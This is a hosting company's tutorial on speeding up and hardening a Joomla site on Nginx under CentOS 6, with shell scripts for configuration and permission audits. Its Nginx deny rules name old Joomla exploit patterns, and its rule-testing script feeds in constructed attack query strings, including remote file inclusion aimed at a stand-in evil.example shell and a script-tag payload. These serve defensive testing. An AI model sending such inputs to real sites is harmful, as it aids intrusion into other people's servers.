Status: This OS is no longer supported
This article, “Optimize your CentOS 6 VPS Nginx-powered Joomla Installation,” covers a version of CentOS that reached end of life (EOL). It is no longer supported. As such, this guide is no longer maintained. If you are currently operating a server running CentOS 6, we highly recommend contacting RoseHosting’s fully managed support. They can upgrade or migrate you to a supported version of AlmaLinux.
As promised, in this sequel to my previous post, we’ll go through some useful steps for the performance and security optimization of your Nginx-powered Joomla installation on a CentOS VPS and get it ready for production. Please note that none of this is a one-off task: performance and security tuning is an ongoing process, and these settings should be revisited as the site, its extensions and its traffic change.
So, the first thing I do after every Joomla installation is to hide its version, since attackers and automated scanners fingerprint the Joomla version in order to pick exploits that match it. Keep in mind that this only removes the version from the page’s generator meta tag; a determined attacker can still fingerprint the release from other files and behaviour, so treat it as a way to reduce scanner noise rather than as real protection. Keeping Joomla up to date is what actually closes the holes.
Show Joomla Version
To hide the Joomla version:
1. Log in to the Admin panel, go to System > Global Configuration, scroll all the way down, and find the Show Joomla! Version option. Set it to No.
Page Compression
- Compress it! With the Gzip option enabled, Joomla compresses the page output before it is sent to the browser. This usually cuts the transferred size of the HTML considerably (often by 70% or more) and with it the transfer time, at the cost of some extra CPU work on the server.
On almost any VPS that trade works in the website’s favour, so enabling it is recommended. If Nginx already has gzip on in its own configuration, compressing in Joomla as well is redundant (Nginx skips responses that already carry a Content-Encoding header), so pick one layer. To enable it in Joomla:
2. Go to System > Global Configuration > Server tab. Find the Gzip Page Compression option and set it to Yes.
Caching
- Cache it! Use this option to boost performance once development is finished and the website is ready to go live; with caching on, content edits may not show up until the cache expires or is cleared. A sensible initial cache time is 60 minutes.
Joomla offers two caching modes, conservative and progressive. Conservative caching is the one to use in almost every case. In short:
– With conservative caching, Joomla keeps one cached copy of each page in its cache directory. When a visitor requests a page, Joomla serves the cached copy if one exists; otherwise it renders the page, stores it, and serves it. The copy is reused until it is older than Cache Time (in minutes).
– With progressive caching, the cache is kept per client rather than per page: Joomla looks for a cached copy for that specific client and, if none exists, renders and stores one for that client only. A new visitor never benefits from what was cached for earlier visitors, so every first visit pays the full rendering cost plus the cost of writing the cache. On a site with mostly one-off visitors this mode can therefore perform worse than Caching Disabled; only returning clients gain. Unless you are certain you need per-client caching, leave it off. To choose your setting:
3. Go to System > Global Configuration > System tab, find the Cache option in the Cache Settings section and set it as explained above. Leave the time at 60 unless you know you need another value. Use File as the Cache Handler unless you have another supported handler installed and configured.
Edit Session Values
Next, adjust the Session Lifetime. The right value depends on your own and your users’ needs; a lower number (the value is in minutes) is stricter. The default is 15, which means a user is logged out automatically after 15 minutes of inactivity. The default, and recommended, Session Handler is Database; setting it to None breaks most of Joomla’s functionality.
So, to edit the Session values:
4. Go to System > Global Configuration > System tab, find the Session Lifetime option in the Session Settings section and set it to the value you have chosen. If you are unsure which number is right for you, simply leave it at the default.
- SEF it! Enabling SEF (Search Engine Friendly) URLs is strongly recommended. The difference is obvious at a glance. With SEF disabled, the URLs look like:
http://joomla.rosehosting.com/index.php?option=com_content&view=article&id=1:test-article&catid=8&Itemid=101
With SEF enabled:
http://joomla.rosehosting.com/index.php/8-test/1-test-article
The steps:
5. If you followed my previous article, you already have the necessary Nginx config line in place, so you just need to go to System > Global Configuration > Site tab > SEO Settings section and set Search Engine Friendly URLs to Yes. Also, make sure System – SEF plugin is enabled in Extensions > Plugin Manager.
If you haven’t followed our previous article, edit your Nginx vhost file and make sure the following location block is in place. It routes every request for a path that does not exist on disk to Joomla’s index.php, with the original query string preserved, which is what SEF URLs rely on when there is no .htaccess:
# vim /etc/nginx/sites-enabled/mydomain.tld.conf
location / {
try_files $uri $uri/ /index.php?$args;
}
Save the file and restart Nginx:
# service nginx restart
Rewrite the URL
In order to ‘decorate’ our URLs even more, enable the Use URL Rewriting option, found right below the Search Engine Friendly URLs option we have just enabled. This drops index.php from the path. On Apache it relies on the rewrite rules in .htaccess; on Nginx the try_files line above does the same job, so without it every rewritten URL would return a 404. The URL should now look like:
http://joomla.rosehosting.com/8-test/1-test-article
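Every option set in steps 1 to 5 ends up as a property in Joomla’s configuration.php, so you can verify from the shell that the clicks actually took effect. The following is an added example, not code from the original article or from Joomla itself: a small POSIX shell audit that reads the relevant properties and reports which ones still differ from the recommendations in this post. The property names ($gzip, $caching, $cachetime, $session_handler, $lifetime, $sef, $sef_rewrite) are assumed from the configuration.php Joomla generates; check them against your own file. The sample configuration.php the script writes is constructed for the demonstration and is not a real site’s file.

```shell
#!/bin/sh
# Added example (not from the article or from Joomla): audit configuration.php
# for the Global Configuration options discussed above. Property names are
# assumed from Joomla's generated configuration.php.

# Print the value of a "public $NAME = '...';" line without quotes; empty if absent.
joomla_cfg_get() {  # <file> <name>
    sed -n "s/^[[:space:]]*public [\$]$2[[:space:]]*=[[:space:]]*'\{0,1\}\([^';]*\)'\{0,1\};.*/\1/p" "$1" | head -n 1
}

# Compare one option with its recommended value. Prints OK/WARN; returns 1 on WARN.
joomla_cfg_expect() {  # <file> <name> <expected> <hint>
    v=$(joomla_cfg_get "$1" "$2")
    if [ "$v" = "$3" ]; then
        echo "OK   $2=$v"
    else
        echo "WARN $2=${v:-unset}: $4"
        return 1
    fi
}

# Run all checks. Returns the number of WARN lines (0 = matches this post's advice).
audit_joomla_cfg() {  # <file>
    f="$1"; warn=0
    joomla_cfg_expect "$f" gzip 1 "set Gzip Page Compression to Yes" || warn=$((warn + 1))
    joomla_cfg_expect "$f" caching 1 "set Cache to Conservative caching (2 = progressive)" || warn=$((warn + 1))
    joomla_cfg_expect "$f" session_handler database "keep the Database session handler" || warn=$((warn + 1))
    joomla_cfg_expect "$f" sef 1 "set Search Engine Friendly URLs to Yes" || warn=$((warn + 1))
    joomla_cfg_expect "$f" sef_rewrite 1 "set Use URL Rewriting to Yes (needs the Nginx try_files line)" || warn=$((warn + 1))
    echo "INFO cachetime=$(joomla_cfg_get "$f" cachetime) min, lifetime=$(joomla_cfg_get "$f" lifetime) min"
    return "$warn"
}

# Constructed sample configuration.php with the install-time defaults still in
# place. Not a real site's file.
write_sample_cfg() {  # <path>
    cat > "$1" <<'EOF'
<?php
class JConfig {
    public $sitename = 'Example Joomla';
    public $gzip = '0';
    public $caching = '0';
    public $cache_handler = 'file';
    public $cachetime = '15';
    public $session_handler = 'database';
    public $lifetime = '15';
    public $sef = '1';
    public $sef_rewrite = '0';
}
EOF
}

# Demo on the constructed sample. On a real server point it at your document
# root instead, e.g. audit_joomla_cfg /var/www/html/joomla/configuration.php
# (assumed path).
sample=$(mktemp)
write_sample_cfg "$sample"
audit_joomla_cfg "$sample" || echo "$? setting(s) need attention"
rm -f "$sample"
```

Run it after saving Global Configuration; three WARN lines on the constructed sample (gzip, caching, sef_rewrite) correspond to steps 2, 3 and the URL rewriting option above.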
Another good idea is to block query-string patterns used by old, well-known Joomla and Mambo exploits: register_globals-style mosConfig_ injection, the sbp and sb_authorname parameters of long-patched third-party components, GLOBALS and _REQUEST overwrites, base64_encode() payloads and inline script tags. Extend the location / block you created for SEF rather than adding a second one, since Nginx refuses a duplicate location /. Note that the ( and [ characters must be escaped in the regular expressions; unescaped, the [ in the GLOBALS and _REQUEST rules starts a character class and the rules match far more than intended. Make sure the following lines are in place:
# vim /etc/nginx/sites-enabled/mydomain.tld.conf
location / {
try_files $uri $uri/ /index.php?$args;
if ($query_string ~ "base64_encode[^(]*\([^)]*\)"){ return 403; }
if ($query_string ~ "sbp(=|%20|%3D)"){ return 403; }
if ($query_string ~ "sb_authorname(=|%20|%3D)"){ return 403; }
if ($query_string ~ "mosConfig_[a-zA-Z_]{1,21}(=|%3D)"){ return 403; }
if ($query_string ~* "(<|%3C).*script.*(>|%3E)"){ return 403; }
if ($query_string ~ "GLOBALS(=|\[|%[0-9A-Z]{0,2})"){ return 403; }
if ($query_string ~ "_REQUEST(=|\[|%[0-9A-Z]{0,2})"){ return 403; }
}
These if blocks only return a status code, which is the one use of if inside a location that Nginx documents as safe. Keep in mind that this is a simple blacklist: ~ matches case-sensitively, so a lower-case %3d gets through where %3D is caught (use ~* if you want case-insensitive matching, as the script rule already does), and the patterns only cover a handful of historic attacks. Treat them as noise reduction, not as a substitute for keeping Joomla and its extensions up to date.
Save the file, check the configuration syntax and restart Nginx:
# nginx -t && service nginx restart
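Before putting rules like these in front of a live site, it helps to see exactly which query strings they catch and which they miss. The following is an added example, not part of the original article: a POSIX shell function that replays the seven patterns above with grep -E against constructed sample query strings, including one that slips through because Nginx’s ~ (like grep -E without -i) matches case-sensitively. It emulates the regular expressions offline and does not talk to Nginx; the sample query strings and the evil.example host are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original article): replay the Nginx query-string
# rules offline with grep -E. Nginx "~" is case-sensitive (grep -E) and "~*" is
# case-insensitive (grep -Ei). All sample query strings below are constructed.

# Return 0 (Nginx would answer 403) if the raw query string matches any rule,
# 1 (the request passes) otherwise.
qs_blocked() {  # <raw query string>
    q="$1"
    printf '%s' "$q" | grep -Eq  'base64_encode[^(]*\([^)]*\)'      && return 0
    printf '%s' "$q" | grep -Eq  'sbp(=|%20|%3D)'                   && return 0
    printf '%s' "$q" | grep -Eq  'sb_authorname(=|%20|%3D)'         && return 0
    printf '%s' "$q" | grep -Eq  'mosConfig_[a-zA-Z_]{1,21}(=|%3D)' && return 0
    printf '%s' "$q" | grep -Eiq '(<|%3C).*script.*(>|%3E)'         && return 0
    printf '%s' "$q" | grep -Eq  'GLOBALS(=|\[|%[0-9A-Z]{0,2})'     && return 0
    printf '%s' "$q" | grep -Eq  '_REQUEST(=|\[|%[0-9A-Z]{0,2})'    && return 0
    return 1
}

# Print the status Nginx would return for each query string given.
qs_report() {
    for q in "$@"; do
        if qs_blocked "$q"; then echo "403 $q"; else echo "200 $q"; fi
    done
}

# Constructed samples: a normal Joomla request, four attack patterns the rules
# target, and the same mosConfig_ injection with a lower-case %3d, which the
# case-sensitive rule lets through (200).
qs_report \
    'option=com_content&view=article&id=1&Itemid=101' \
    'option=com_content&mosConfig_absolute_path=http://evil.example/shell.txt' \
    'option=com_simpleboard&sb_authorname=x&sbp=1' \
    'search=%3Cscript%3Ealert(1)%3C/script%3E' \
    'x=1&GLOBALS[foo]=bar' \
    'mosConfig_absolute_path%3dhttp://evil.example/shell.txt'
```

If the last line coming back as 200 bothers you, switch the corresponding Nginx rule from ~ to ~* (and the grep -Eq here to grep -Eiq) and rerun; the report then shows 403 for it.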
These are some of the optimization and protective measures you can take to secure and speed up your Joomla installation. Of course, there is no such thing as perfect safety, so feel free to test your Joomla and harden it further if this does not seem enough. Above all, keep your Joomla installation and its plugins/extensions up to date by upgrading whenever a new version comes out, and uninstall (don’t just disable) extensions you do not need.
Also, make sure you have the correct file and directory permissions. All files should be 644 and all directories 755 (unless you know exactly why you need something else); in particular, nothing under the web root should be world-writable.
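To apply and verify that permission scheme across the whole tree, here is an added example (not from the original article) with two POSIX shell functions: one normalises files to 644 and directories to 755, the other counts what still deviates so you can audit before and after the fix. The /var/www/html/joomla path in the usage comment is an assumed document root; substitute your own.

```shell
#!/bin/sh
# Added example (not from the original article): normalise Joomla permissions
# to 644 for files and 755 for directories, and count anything that deviates.
# /var/www/html/joomla below is an assumed document root.

# Set every directory below the root to 755 and every file to 644.
fix_joomla_perms() {  # <document root>
    root="$1"
    find "$root" -type d -exec chmod 755 {} +
    find "$root" -type f -exec chmod 644 {} +
}

# Print the number of files not exactly 644 plus directories not exactly 755.
# 0 means the tree matches the recommendation above; anything else is worth
# a look before (or after) running fix_joomla_perms.
count_bad_perms() {  # <document root>
    root="$1"
    files=$(find "$root" -type f ! -perm 644 | wc -l)
    dirs=$(find "$root" -type d ! -perm 755 | wc -l)
    echo $((files + dirs))
}

# Usage, as root or as the owner of the tree (assumed path):
#   count_bad_perms /var/www/html/joomla   # audit first
#   fix_joomla_perms /var/www/html/joomla  # then normalise
#   count_bad_perms /var/www/html/joomla   # should now print 0
```

Run the audit first: a non-zero count on a supposedly clean tree often points at a file an installer or FTP upload left world-writable, which is exactly what you want to know about before a compromise tells you.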
Conclusion
Now you have optimized and secured a Joomla installation on your CentOS 6 VPS, ready to go into production.
Of course, if you are one of our Linux VPS Hosting customers, you don’t have to do any of this; simply ask our admins, sit back, and relax. Our admins will set this up for you immediately.
PS. If you liked this post, please share it with your friends on the social networks using the buttons on the left or simply leave a reply below. Thanks.